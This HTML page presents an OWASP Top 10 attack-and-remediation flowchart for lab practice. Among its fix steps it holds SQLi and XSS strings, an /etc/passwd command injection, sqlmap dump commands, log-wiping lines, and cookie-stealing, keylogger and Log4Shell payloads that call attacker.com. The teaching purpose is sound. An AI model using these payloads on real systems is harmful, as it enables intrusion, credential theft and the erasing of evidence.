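<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <!-- "&" is escaped so the title is never parsed as a character reference -->
  <title>OWASP Top 10 — Attack &amp; Remediation Flowchart</title>
  <meta name="description" content="Interactive OWASP Top 10 flowchart: attack methodology on dummy/lab environments with step-by-step remediation.">
  <style>
    /* Reset and page shell */
    * { box-sizing: border-box; margin: 0; padding: 0; }
    body { font-family: 'Segoe UI', Arial, sans-serif; background: #0a0a0f; color: #e0e0e0; min-height: 100vh; }
    .header {
      background: linear-gradient(135deg, #1a1a2e 0%, #16213e 50%, #0f3460 100%);
      padding: 30px 40px;
      border-bottom: 3px solid #e94560;
      text-align: center;
    }
    .header h1 { font-size: 2rem; color: #fff; letter-spacing: 2px; }
    .header p { color: #a0a0b0; margin-top: 8px; font-size: 0.95rem; }
    .header .badge { display: inline-block; background: #e94560; color: white; padding: 4px 14px; border-radius: 20px; font-size: 0.75rem; margin-top: 10px; letter-spacing: 1px; }
    /* Colour legend under the header */
    .legend {
      display: flex; gap: 20px; flex-wrap: wrap; justify-content: center;
      padding: 16px 40px; background: #111120; border-bottom: 1px solid #222240;
    }
    .legend-item { display: flex; align-items: center; gap: 8px; font-size: 0.8rem; color: #aaa; }
    .legend-dot { width: 14px; height: 14px; border-radius: 3px; }
    .container { padding: 30px 20px; max-width: 1400px; margin: 0 auto; }
    .owasp-grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(380px, 1fr)); gap: 30px; }
    /* Vulnerability card (one per OWASP category) */
    .vuln-card {
      background: #111120;
      border: 1px solid #222240;
      border-radius: 12px;
      overflow: hidden;
      transition: transform 0.2s, box-shadow 0.2s;
    }
    .vuln-card:hover { transform: translateY(-4px); box-shadow: 0 12px 40px rgba(233,69,96,0.15); }
    .card-header {
      padding: 16px 20px;
      display: flex; align-items: center; gap: 14px;
      cursor: pointer; user-select: none;
    }
    /* Visible focus ring for keyboard users when the header is focusable */
    .card-header:focus-visible { outline: 2px solid #3498db; outline-offset: -2px; }
    .card-header .num {
      width: 40px; height: 40px; border-radius: 50%;
      display: flex; align-items: center; justify-content: center;
      font-weight: 900; font-size: 1rem; flex-shrink: 0;
    }
    .card-header .title-block { flex: 1; }
    .card-header h3 { font-size: 0.95rem; color: #fff; }
    .card-header .cve { font-size: 0.72rem; color: #888; margin-top: 2px; }
    .card-header .sev-badge {
      font-size: 0.7rem; font-weight: 700; padding: 3px 10px;
      border-radius: 12px; letter-spacing: 0.5px; flex-shrink: 0;
    }
    .toggle-icon { color: #888; font-size: 1.1rem; flex-shrink: 0; transition: transform 0.3s; }
    .card-body { display: none; padding: 0 20px 20px; }
    .card-body.open { display: block; }
    .toggle-icon.open { transform: rotate(180deg); }
    /* Flowchart styles */
    .flowchart { position: relative; }
    .flow-step {
      position: relative;
      display: flex;
      align-items: flex-start;
      gap: 14px;
      margin-bottom: 6px;
    }
    .flow-line {
      display: flex;
      flex-direction: column;
      align-items: center;
      flex-shrink: 0;
      width: 32px;
    }
    .flow-node {
      width: 32px; height: 32px;
      border-radius: 50%;
      display: flex; align-items: center; justify-content: center;
      font-size: 0.75rem; font-weight: 700; flex-shrink: 0;
      border: 2px solid transparent;
      z-index: 1;
    }
    .flow-connector {
      width: 2px;
      flex: 1;
      min-height: 12px;
      background: #333355;
      margin: 0 auto;
    }
    .flow-content {
      flex: 1;
      padding: 10px 14px;
      border-radius: 8px;
      margin-bottom: 8px;
      border-left: 3px solid transparent;
    }
    .flow-content h4 { font-size: 0.8rem; font-weight: 700; margin-bottom: 4px; }
    .flow-content p { font-size: 0.75rem; color: #aaa; line-height: 1.5; }
    .flow-content code {
      display: inline-block; background: #0a0a1a; color: #50fa7b;
      padding: 2px 6px; border-radius: 4px; font-size: 0.7rem;
      font-family: 'Courier New', monospace; margin-top: 4px;
      word-break: break-all;
    }
    .flow-content .tool-tag {
      display: inline-block; background: #1a1a3e; color: #8be9fd;
      padding: 2px 8px; border-radius: 10px; font-size: 0.68rem;
      margin: 2px 2px 0 0; border: 1px solid #2a2a5e;
    }
    /* Step types — one colour per legend entry */
    .step-recon .flow-node { background: #2a1a4e; border-color: #9b59b6; color: #9b59b6; }
    .step-recon .flow-content { background: #1a0d2e; border-color: #9b59b6; }
    .step-recon .flow-content h4 { color: #9b59b6; }
    .step-attack .flow-node { background: #4e1a1a; border-color: #e94560; color: #e94560; }
    .step-attack .flow-content { background: #2e0d0d; border-color: #e94560; }
    .step-attack .flow-content h4 { color: #e94560; }
    .step-exploit .flow-node { background: #4e2e0a; border-color: #f39c12; color: #f39c12; }
    .step-exploit .flow-content { background: #2e1a05; border-color: #f39c12; }
    .step-exploit .flow-content h4 { color: #f39c12; }
    .step-impact .flow-node { background: #1a0a0a; border-color: #ff4444; color: #ff4444; }
    .step-impact .flow-content { background: #1a0505; border-color: #ff4444; }
    .step-impact .flow-content h4 { color: #ff4444; }
    .step-fix .flow-node { background: #0a2e1a; border-color: #2ecc71; color: #2ecc71; }
    .step-fix .flow-content { background: #051a0d; border-color: #2ecc71; }
    .step-fix .flow-content h4 { color: #2ecc71; }
    .step-test .flow-node { background: #0a1a2e; border-color: #3498db; color: #3498db; }
    .step-test .flow-content { background: #050d1a; border-color: #3498db; }
    .step-test .flow-content h4 { color: #3498db; }
    /* Section dividers inside a card (ATTACK FLOW / REMEDIATION) */
    .divider {
      display: flex; align-items: center; gap: 10px;
      margin: 16px 0 12px;
    }
    .divider-line { flex: 1; height: 1px; background: #222240; }
    .divider-label {
      font-size: 0.7rem; font-weight: 700; letter-spacing: 1px;
      padding: 3px 12px; border-radius: 10px;
    }
    .divider-attack .divider-label { background: #2e0d0d; color: #e94560; border: 1px solid #e94560; }
    .divider-fix .divider-label { background: #051a0d; color: #2ecc71; border: 1px solid #2ecc71; }
    /* severity colors */
    .sev-critical { background: #e94560; color: white; }
    .sev-high { background: #e67e22; color: white; }
    .sev-medium { background: #f39c12; color: #1a1a1a; }
    .sev-low { background: #3498db; color: white; }
    .num-critical { background: #e94560; color: white; }
    .num-high { background: #e67e22; color: white; }
    .num-medium { background: #f39c12; color: #1a1a1a; }
    .num-low { background: #3498db; color: white; }
    /* dummy target box */
    .dummy-target {
      background: linear-gradient(135deg, #1a1a2e, #16213e);
      border: 2px dashed #3498db;
      border-radius: 12px;
      padding: 20px 30px;
      margin-bottom: 30px;
      text-align: center;
    }
    .dummy-target h2 { color: #3498db; font-size: 1.1rem; margin-bottom: 10px; }
    .dummy-target p { color: #888; font-size: 0.85rem; }
    .dummy-target .env-grid { display: flex; flex-wrap: wrap; gap: 10px; justify-content: center; margin-top: 12px; }
    .env-item { background: #111130; border: 1px solid #2a2a5e; padding: 6px 14px; border-radius: 8px; font-size: 0.75rem; color: #8be9fd; }
    .section-title {
      color: #fff;
      font-size: 1.2rem;
      margin: 10px 0 20px;
      padding-bottom: 10px;
      border-bottom: 2px solid #222240;
      display: flex; align-items: center; gap: 10px;
    }
    .section-title span { color: #e94560; }
    footer {
      text-align: center; padding: 20px;
      color: #555; font-size: 0.75rem;
      border-top: 1px solid #1a1a2e;
      margin-top: 40px;
    }
  </style>
</head>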
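<body>
  <!-- Landmark elements (header/main/footer) keep the existing class hooks so the CSS is unchanged -->
  <header class="header">
    <h1>⚔ OWASP TOP 10 — ATTACK &amp; REMEDIATION FLOWCHART</h1>
    <p>Practical attack methodology on dummy/lab environments with step-by-step remediation</p>
    <div class="badge">FOR AUTHORIZED TESTING ONLY — EDUCATIONAL PURPOSE</div>
  </header>
  <div class="legend">
    <div class="legend-item"><div class="legend-dot" style="background:#9b59b6"></div> Reconnaissance</div>
    <div class="legend-item"><div class="legend-dot" style="background:#e94560"></div> Attack Step</div>
    <div class="legend-item"><div class="legend-dot" style="background:#f39c12"></div> Exploit</div>
    <div class="legend-item"><div class="legend-dot" style="background:#ff4444"></div> Impact</div>
    <div class="legend-item"><div class="legend-dot" style="background:#2ecc71"></div> Remediation</div>
    <div class="legend-item"><div class="legend-dot" style="background:#3498db"></div> Verify Fix</div>
  </div>
  <main class="container">
    <!-- Dummy Target Setup -->
    <section class="dummy-target">
      <h2>🎯 Recommended Dummy / Lab Targets for Practice</h2>
      <p>Always practice on intentionally vulnerable applications. Never test on live websites without written permission.</p>
      <div class="env-grid">
        <div class="env-item">🐐 DVWA (Damn Vulnerable Web App)</div>
        <div class="env-item">🧃 OWASP Juice Shop</div>
        <div class="env-item">🕸 WebGoat</div>
        <div class="env-item">🔓 bWAPP</div>
        <div class="env-item">🐝 HackTheBox</div>
        <div class="env-item">🏴 TryHackMe</div>
        <div class="env-item">🐳 Docker: vulhub</div>
      </div>
    </section>
    <div class="section-title"><span>⚡</span> Click each vulnerability card to expand the full attack flowchart</div>
    <!-- Populated by buildCard() in the script below; the id is the JS hook -->
    <div class="owasp-grid" id="vulnGrid"></div>
  </main>
  <footer>⚠ This flowchart is for educational and authorized penetration testing only. Unauthorized attacks are illegal. Always get written permission before testing.</footer>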
<script>
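// Card data for the ten OWASP Top 10 (2021) categories rendered by buildCard().
// Each entry: id, title, cve (reference CVE | CWE), sev (critical|high|medium|low)
// and an ordered list of steps. Step fields: type (recon|attack|exploit|impact|fix|test),
// icon, title, desc, optional tools[] and optional code (multi-line, "\n" separated).
// NOTE: this literal lives inside an inline <script> element. The HTML parser ends
// that element at the first literal "</script>" it meets — even inside a JS string —
// which truncated the script and broke the whole page. Any closing script tag in the
// data must therefore be written as "<\/script>" (same runtime string, safe in HTML).
const vulns = [
  {
    id: "A01",
    title: "A01 — Broken Access Control",
    cve: "CVE-2021-41773 | CWE-284",
    sev: "critical",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Identify protected endpoints and user roles", tools: ["Burp Suite", "FFUF", "DirBuster"], code: "ffuf -u http://target/FUZZ -w /wordlists/common.txt" },
      { type: "attack", icon: "⚔", title: "Forced Browsing", desc: "Try to access admin/restricted URLs directly without authentication", tools: ["Browser", "Burp Repeater"], code: "GET /admin/users HTTP/1.1\nHost: target.com" },
      { type: "attack", icon: "⚔", title: "IDOR — Insecure Direct Object Reference", desc: "Manipulate object IDs in requests to access other users' data", tools: ["Burp Suite", "Intruder"], code: "GET /api/orders/1337 → change to /api/orders/1338" },
      { type: "attack", icon: "⚔", title: "Privilege Escalation", desc: "Change role parameter in request body or cookie", code: "POST /profile\nbody: {\"role\": \"admin\", \"id\": 5}" },
      { type: "exploit", icon: "💥", title: "Horizontal & Vertical Escalation", desc: "Access another user's account (horizontal) or elevate to admin (vertical)", code: "Cookie: user_id=2 → user_id=1 (admin)" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Unauthorized data access, account takeover, full admin control, data deletion" },
      { type: "fix", icon: "🛡", title: "Remediation", desc: "Enforce server-side authorization checks on every request. Deny by default.", code: "if (!user.hasRole('admin')) return 403;" },
      { type: "fix", icon: "🛡", title: "Implement RBAC", desc: "Use Role-Based Access Control. Log all access control failures.", code: "app.use(rbacMiddleware({ role: 'admin' }));" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Re-test all restricted endpoints as different roles. Use Burp to confirm 403 responses.", tools: ["Burp Suite", "OWASP ZAP"] },
    ]
  },
  {
    id: "A02",
    title: "A02 — Cryptographic Failures",
    cve: "CVE-2021-3449 | CWE-327",
    sev: "critical",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Check SSL/TLS version, identify sensitive data in transit and at rest", tools: ["SSLScan", "Nmap", "Burp Suite"], code: "sslscan target.com\nnmap --script ssl-enum-ciphers target.com" },
      { type: "attack", icon: "⚔", title: "Intercept HTTP Traffic", desc: "Look for sensitive data (passwords, tokens) sent over HTTP instead of HTTPS", tools: ["Burp Suite", "Wireshark"], code: "Set Burp as proxy → look for plaintext credentials" },
      { type: "attack", icon: "⚔", title: "Check Weak Encryption", desc: "Identify MD5/SHA1 password hashing, weak ciphers, or hardcoded keys in source", code: "grep -r 'md5\\|sha1\\|password' ./source/" },
      { type: "exploit", icon: "💥", title: "Decrypt Weak Hashes", desc: "Use rainbow tables or hashcat to crack MD5/SHA1 password hashes", tools: ["Hashcat", "CrackStation"], code: "hashcat -m 0 hash.txt rockyou.txt\n# -m 0 = MD5" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Exposed passwords, stolen credit cards, PII data breach, regulatory fines" },
      { type: "fix", icon: "🛡", title: "Use Strong Hashing", desc: "Use bcrypt, Argon2, or scrypt for passwords. Never MD5/SHA1.", code: "const hash = await bcrypt.hash(password, 12);" },
      { type: "fix", icon: "🛡", title: "Enforce HTTPS + HSTS", desc: "Redirect all HTTP to HTTPS. Add HSTS header with long max-age.", code: "Strict-Transport-Security: max-age=31536000; includeSubDomains" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Run SSLLabs SSL test. Confirm all passwords stored as bcrypt.", tools: ["SSL Labs", "SSLScan"] },
    ]
  },
  {
    id: "A03",
    title: "A03 — Injection (SQLi, XSS, Command)",
    cve: "CVE-2021-44228 | CWE-89",
    sev: "critical",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Find all input fields, URL parameters, and headers that get processed by the server", tools: ["Burp Spider", "FFUF", "Nikto"], code: "nikto -h http://target.com" },
      { type: "attack", icon: "⚔", title: "SQL Injection Test", desc: "Inject SQL payloads into login forms, search fields, URL params", tools: ["SQLMap", "Burp Suite"], code: "' OR '1'='1\n' OR 1=1--\n\" OR \"1\"=\"1" },
      { type: "attack", icon: "⚔", title: "SQLMap Automated Scan", desc: "Run SQLMap on identified injection points to dump the database", tools: ["SQLMap"], code: "sqlmap -u 'http://target.com/item?id=1' --dbs\nsqlmap -u 'http://target.com/item?id=1' -D shopdb --tables --dump" },
      // "<\/script>" — see the note above; the runtime string is unchanged.
      { type: "attack", icon: "⚔", title: "XSS — Cross Site Scripting", desc: "Inject JavaScript into input fields that gets rendered in the browser", code: "<script>alert('XSS')<\/script>\n<img src=x onerror=alert(document.cookie)>" },
      { type: "attack", icon: "⚔", title: "Command Injection", desc: "Inject OS commands via input fields that get executed on the server", code: "127.0.0.1; cat /etc/passwd\n127.0.0.1 && whoami" },
      { type: "exploit", icon: "💥", title: "Dump Database / Steal Cookies", desc: "Extract user credentials, PII, payment data from the database", tools: ["SQLMap", "Burp"], code: "sqlmap ... --dump -T users -C username,password" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Full database compromise, account takeover, remote code execution, defacement" },
      { type: "fix", icon: "🛡", title: "Use Parameterized Queries", desc: "Never concatenate user input into SQL. Use prepared statements.", code: "db.query('SELECT * FROM users WHERE id = ?', [userId]);" },
      { type: "fix", icon: "🛡", title: "Sanitize & Encode Output", desc: "Encode all output for XSS. Use Content-Security-Policy header.", code: "const safe = DOMPurify.sanitize(userInput);\nres.setHeader('Content-Security-Policy', \"default-src 'self'\");" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Re-run SQLMap — should get no injection points. Test XSS payloads manually.", tools: ["SQLMap", "OWASP ZAP"] },
    ]
  },
  {
    id: "A04",
    title: "A04 — Insecure Design",
    cve: "CVE-2022-22965 | CWE-306",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Map application workflows, business logic, and identify missing threat model controls", tools: ["Burp Suite", "Manual Review"], code: "Analyze password reset flow, shopping cart logic, coupon codes" },
      { type: "attack", icon: "⚔", title: "Business Logic Abuse", desc: "Apply same coupon code multiple times. Add negative quantities to cart.", code: "POST /cart/update\nbody: {quantity: -1, price: 99.99}" },
      { type: "attack", icon: "⚔", title: "Race Condition Attack", desc: "Send multiple simultaneous requests to exploit race conditions in business logic", tools: ["Burp Turbo Intruder", "Python requests"], code: "# Send 50 concurrent coupon redemption requests\nimport threading\nthreading.Thread(target=redeem).start()" },
      { type: "attack", icon: "⚔", title: "Password Reset Abuse", desc: "Test if reset tokens expire, can be reused, or are predictable", code: "Request reset → use token after 24hrs\nRequest reset twice → use first token" },
      { type: "exploit", icon: "💥", title: "Bypass Business Rules", desc: "Get items for free, reuse discounts, bypass payment, access locked features", code: "Cart total becomes negative → store owes attacker money" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Financial loss, free product acquisition, privilege bypass, data integrity violations" },
      { type: "fix", icon: "🛡", title: "Server-Side Business Logic", desc: "Validate all business rules server-side. Never trust client-submitted prices.", code: "// Always recalculate price from database\nconst price = await Product.findById(id).price;" },
      { type: "fix", icon: "🛡", title: "Rate Limiting & Token Expiry", desc: "Expire reset tokens after 15 mins. Limit coupon use to 1 per user. Add rate limiting.", code: "if (token.createdAt < Date.now() - 900000) return 410;" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Try all business logic abuse scenarios again. Confirm server rejects invalid states." },
    ]
  },
  {
    id: "A05",
    title: "A05 — Security Misconfiguration",
    cve: "CVE-2021-41773 | CWE-16",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Scan for open ports, exposed admin panels, default credentials, verbose errors", tools: ["Nmap", "Shodan", "Nikto"], code: "nmap -sV -sC -p- target.com\nnikto -h http://target.com" },
      { type: "attack", icon: "⚔", title: "Default Credentials", desc: "Try default username/password combos on admin panels", tools: ["Burp Intruder", "Hydra"], code: "admin:admin, admin:password\nroot:root, admin:1234" },
      { type: "attack", icon: "⚔", title: "Directory Listing & Exposed Files", desc: "Check for open directory listings, .git folders, .env files, backup files", tools: ["FFUF", "DirBuster"], code: "ffuf -u http://target/FUZZ -w wordlist.txt\nCheck: /.env, /.git, /backup.zip, /phpinfo.php" },
      { type: "attack", icon: "⚔", title: "Verbose Error Messages", desc: "Trigger errors to extract stack traces, database names, file paths", code: "Submit invalid input → look for error messages\nGET /item?id=abc → SQL error reveals DB structure" },
      { type: "exploit", icon: "💥", title: "Access Admin Panel / Source Code", desc: "Use found credentials or exposed files to gain admin access or read sensitive configs", code: "curl http://target.com/.env\n# Reveals: DB_PASSWORD=secret123, API_KEY=..." },
      { type: "impact", icon: "☠", title: "Impact", desc: "Full server compromise, credential theft, data exfiltration, ransomware deployment" },
      { type: "fix", icon: "🛡", title: "Harden Configuration", desc: "Remove default accounts. Disable directory listing. Hide server version headers.", code: "ServerTokens Prod\nServerSignature Off\nOptions -Indexes" },
      { type: "fix", icon: "🛡", title: "Secure Error Handling", desc: "Show generic error pages to users. Log details server-side only.", code: "app.use((err, req, res) => {\n res.status(500).json({error: 'Internal error'});\n});" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Re-run Nmap and Nikto. Confirm no sensitive files accessible. Test error messages.", tools: ["Nmap", "Nikto", "FFUF"] },
    ]
  },
  {
    id: "A06",
    title: "A06 — Vulnerable & Outdated Components",
    cve: "CVE-2021-44228 (Log4Shell) | CWE-1104",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Identify technology stack, framework versions, and third-party libraries", tools: ["Wappalyzer", "Retire.js", "Burp"], code: "Check: X-Powered-By header, /package.json, /composer.json" },
      { type: "attack", icon: "⚔", title: "Identify Vulnerable Versions", desc: "Check identified components against known CVE databases", tools: ["CVE Mitre", "Snyk", "OWASP DC"], code: "npm audit\npip-audit\nowasp-dependency-check --project app --scan ./" },
      { type: "attack", icon: "⚔", title: "Exploit Known CVE", desc: "Download and run PoC exploit for identified vulnerable component version", tools: ["Exploit-DB", "Metasploit", "GitHub PoC"], code: "searchsploit jQuery 1.x\nmsfconsole → use exploit/multi/handler" },
      { type: "attack", icon: "⚔", title: "Log4Shell Example (CVE-2021-44228)", desc: "Inject JNDI lookup payload via any user-controlled input field", code: "${jndi:ldap://attacker.com/exploit}\n# Works in: User-Agent, X-Forwarded-For, search boxes" },
      { type: "exploit", icon: "💥", title: "Remote Code Execution", desc: "Malicious LDAP server responds with exploit class → RCE on target server", code: "Target executes attacker's Java class\n→ Reverse shell, data exfiltration" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Remote code execution, full server takeover, lateral movement, ransomware" },
      { type: "fix", icon: "🛡", title: "Update All Dependencies", desc: "Pin to latest secure versions. Use automated dependency scanning in CI/CD.", code: "npm audit fix\nnpm update\npip install --upgrade -r requirements.txt" },
      { type: "fix", icon: "🛡", title: "Automate Vulnerability Scanning", desc: "Add Snyk or OWASP Dependency Check to your build pipeline", code: "# GitHub Actions\n- uses: snyk/actions/node@master\n env:\n SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Re-run npm audit / pip-audit — should show 0 vulnerabilities. Retest CVE PoC." },
    ]
  },
  {
    id: "A07",
    title: "A07 — Identification & Authentication Failures",
    cve: "CVE-2020-35196 | CWE-287",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Identify login page, password reset, session management mechanisms", tools: ["Burp Suite", "Browser DevTools"], code: "Check: session cookie flags, login endpoint, reset flow" },
      { type: "attack", icon: "⚔", title: "Brute Force Login", desc: "Automate password guessing on login endpoint with common wordlists", tools: ["Burp Intruder", "Hydra"], code: "hydra -l admin -P rockyou.txt target.com http-post-form\n'/login:user=^USER^&pass=^PASS^:Invalid'" },
      { type: "attack", icon: "⚔", title: "Session Token Analysis", desc: "Inspect session cookies — check if they're predictable, missing Secure/HttpOnly flags", tools: ["Burp Suite", "JWT.io"], code: "Cookie: session=dXNlcl9pZD0x\n# base64 decode → user_id=1 (predictable!)" },
      { type: "attack", icon: "⚔", title: "JWT Attacks", desc: "Test for alg:none attack, weak secret brute-force on JWT tokens", tools: ["jwt_tool", "hashcat"], code: "# alg:none attack\nheader: {\"alg\":\"none\"}\n# Brute force secret:\njohn --wordlist=rockyou.txt jwt.txt" },
      { type: "attack", icon: "⚔", title: "Password Reset Poisoning", desc: "Modify Host header in password reset request to hijack reset link", code: "POST /reset-password\nHost: attacker.com\n# Reset email contains link to attacker.com" },
      { type: "exploit", icon: "💥", title: "Account Takeover", desc: "Use stolen/guessed credentials or forged session token to log in as victim", code: "Cookie: session=forged_token → logged in as admin" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Account takeover, identity theft, unauthorized transactions, admin access" },
      { type: "fix", icon: "🛡", title: "Implement MFA + Account Lockout", desc: "Add multi-factor auth. Lock accounts after 5 failed attempts. Rate limit login.", code: "if (failedAttempts >= 5) lockAccount(userId, '15min');" },
      { type: "fix", icon: "🛡", title: "Secure Session Management", desc: "Use random 128-bit session IDs. Set Secure, HttpOnly, SameSite=Strict on cookies.", code: "Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Strict; Path=/" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Try brute force — confirm lockout triggers. Verify JWT rejects alg:none. Check cookie flags." },
    ]
  },
  {
    id: "A08",
    title: "A08 — Software & Data Integrity Failures",
    cve: "CVE-2022-29582 | CWE-494",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Identify CI/CD pipeline, auto-update mechanisms, external scripts without SRI", tools: ["Browser DevTools", "Burp", "Wappalyzer"], code: "View source → find <script src='external-cdn.com/...'>\nCheck for missing integrity= attribute" },
      { type: "attack", icon: "⚔", title: "Supply Chain Attack Simulation", desc: "In lab: modify a local CDN-served script to inject malicious code", tools: ["Local HTTP server", "Burp"], code: "# Serve malicious script on attacker's CDN\necho 'fetch(\"//attacker.com?c=\"+document.cookie)' > evil.js" },
      { type: "attack", icon: "⚔", title: "CI/CD Pipeline Poisoning", desc: "In lab: inject malicious code into a build script or dependency", tools: ["Git", "npm"], code: "# Malicious npm package\nnpm install malicious-package\n# Runs postinstall hook with exfil code" },
      { type: "attack", icon: "⚔", title: "Insecure Deserialization", desc: "Manipulate serialized objects in cookies or API params to execute code", code: "Cookie: user=O:8:\"UserObj\":1:{s:4:\"role\";s:5:\"admin\";}\n# PHP object injection → privilege escalation" },
      { type: "exploit", icon: "💥", title: "Malicious Code Execution on Client", desc: "Injected script runs in every visitor's browser — steals cookies, keylogging", code: "// Runs on every page load for all visitors\ndocument.onkeydown = (e) => fetch('//attacker.com?k='+e.key);" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Mass credential theft, malware distribution, full supply chain compromise" },
      // "<\/script>" — see the note above; the runtime string is unchanged.
      { type: "fix", icon: "🛡", title: "Add Subresource Integrity (SRI)", desc: "Add integrity hash to all external scripts and stylesheets", code: "<script src='https://cdn.com/lib.js'\n integrity='sha384-HASH'\n crossorigin='anonymous'><\/script>" },
      { type: "fix", icon: "🛡", title: "Secure CI/CD Pipeline", desc: "Pin dependency versions. Sign commits. Use dependency review in PRs.", code: "# package.json — use exact versions\n\"dependencies\": { \"express\": \"4.18.2\" }\n# Not: \"^4.18.2\" (allows updates)" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Modify external script — browser should block load with SRI error in console." },
    ]
  },
  {
    id: "A09",
    title: "A09 — Security Logging & Monitoring Failures",
    cve: "CVE-2021-44832 | CWE-778",
    sev: "medium",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Test if failed logins, access control violations, and errors are being logged and alerted", tools: ["Burp Suite", "Manual Testing"], code: "Attempt 100 failed logins → check if any alert fires" },
      { type: "attack", icon: "⚔", title: "Login Brute Force Without Detection", desc: "Run hundreds of login attempts — does the app detect, alert, or block?", tools: ["Burp Intruder", "Hydra"], code: "# 500 login attempts with no rate limit → no alert\nhydra -l admin -P rockyou.txt target.com http-form-post ..." },
      { type: "attack", icon: "⚔", title: "Log Injection", desc: "Inject fake log entries via user-controlled input to cover tracks or confuse SIEM", code: "username: admin\\nINFO 2026-02-20 Login successful for admin\n# Injects fake success log entry" },
      { type: "attack", icon: "⚔", title: "Cover Tracks", desc: "If logs are accessible, delete or modify log files after attack", code: "echo '' > /var/log/apache2/access.log\n# or inject null bytes to corrupt logs" },
      { type: "exploit", icon: "💥", title: "Undetected Long-Term Attack", desc: "Attacker dwells in network for months undetected — exfiltrates data silently", code: "Average breach detection time: 207 days (IBM 2023)" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Undetected breaches, no forensic evidence, regulatory non-compliance, delayed response" },
      { type: "fix", icon: "🛡", title: "Implement Comprehensive Logging", desc: "Log all auth events, access control failures, and input validation errors with timestamps and IP", code: "logger.warn('Failed login: ' + username + ' from ' + ip + ' at ' + Date.now());" },
      { type: "fix", icon: "🛡", title: "Set Up Alerting & SIEM", desc: "Alert on 5+ failed logins/minute. Use tools like ELK Stack, Splunk, or Datadog.", code: "# Alert rule example\nIF failed_logins > 5 IN 60s FROM same_ip\nTHEN alert + block_ip + notify_team" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Trigger 10 failed logins — confirm alert fires. Check logs contain all required fields." },
    ]
  },
  {
    id: "A10",
    title: "A10 — Server-Side Request Forgery (SSRF)",
    cve: "CVE-2021-26084 | CWE-918",
    sev: "high",
    steps: [
      { type: "recon", icon: "🔍", title: "Reconnaissance", desc: "Find features that fetch external URLs: webhooks, image importers, URL previews, PDF generators", tools: ["Burp Suite", "Manual Review"], code: "Look for: ?url=, ?path=, ?redirect=, webhook fields\nImage import from URL features" },
      { type: "attack", icon: "⚔", title: "Basic SSRF Test", desc: "Replace URL parameter with internal IP addresses to probe internal network", tools: ["Burp Suite", "Interactsh"], code: "GET /fetch?url=http://127.0.0.1/admin\nGET /fetch?url=http://169.254.169.254/latest/meta-data/" },
      { type: "attack", icon: "⚔", title: "AWS Metadata SSRF", desc: "In cloud environments, steal IAM credentials from metadata service", code: "GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/\n→ Returns AWS Access Key + Secret!" },
      { type: "attack", icon: "⚔", title: "SSRF Filter Bypass", desc: "Bypass URL allowlists using IP encoding tricks", code: "http://2130706433/ → 127.0.0.1\nhttp://0x7f000001/ → 127.0.0.1\nhttp://127.1/ → 127.0.0.1\nhttp://attacker.com@internal.host/" },
      { type: "attack", icon: "⚔", title: "Port Scanning via SSRF", desc: "Use SSRF to scan internal network for services", code: "for port in 22 80 443 3306 6379 8080:\n GET /fetch?url=http://192.168.1.1:{port}" },
      { type: "exploit", icon: "💥", title: "Pivot to Internal Services", desc: "Access internal admin panels, databases, Redis, Elasticsearch that aren't internet-facing", code: "GET /fetch?url=http://internal-admin:8080/\n→ Returns internal admin panel HTML" },
      { type: "impact", icon: "☠", title: "Impact", desc: "Cloud credential theft, internal network access, RCE via internal services, data exfiltration" },
      { type: "fix", icon: "🛡", title: "Allowlist External URLs", desc: "Only allow specific approved domains. Block internal IP ranges completely.", code: "const allowed = ['api.stripe.com', 'cdn.example.com'];\nif (!allowed.includes(new URL(url).hostname)) return 403;" },
      { type: "fix", icon: "🛡", title: "Network Segmentation", desc: "Block server outbound access to 169.254.x.x, 10.x.x.x, 172.16.x.x, 192.168.x.x", code: "# iptables rule\niptables -A OUTPUT -d 169.254.0.0/16 -j DROP\niptables -A OUTPUT -d 192.168.0.0/16 -j DROP" },
      { type: "test", icon: "✅", title: "Verify Fix", desc: "Test all SSRF bypass techniques. Confirm metadata endpoint blocked. Verify internal IPs rejected." },
    ]
  },
];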
// Glyph shown inside the circular flow node for each step type.
const stepIcons = {
  recon: "🔍",
  attack: "⚔",
  exploit: "💥",
  impact: "☠",
  fix: "🛡",
  test: "✅",
};
// Upper-case prefix used in each step heading ("RECON: Reconnaissance").
const stepLabels = {
  recon: "RECON",
  attack: "ATTACK",
  exploit: "EXPLOIT",
  impact: "IMPACT",
  fix: "FIX",
  test: "VERIFY",
};
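/**
 * Escape the characters that are significant in HTML text and attribute values.
 *
 * The card data is interpolated into innerHTML; several `code` strings are themselves
 * HTML (e.g. an <img onerror=…> payload), and without escaping the browser parsed and
 * *executed* them when the card was built. Escaping turns every data string into
 * literal text, which is how a flowchart should display a payload.
 *
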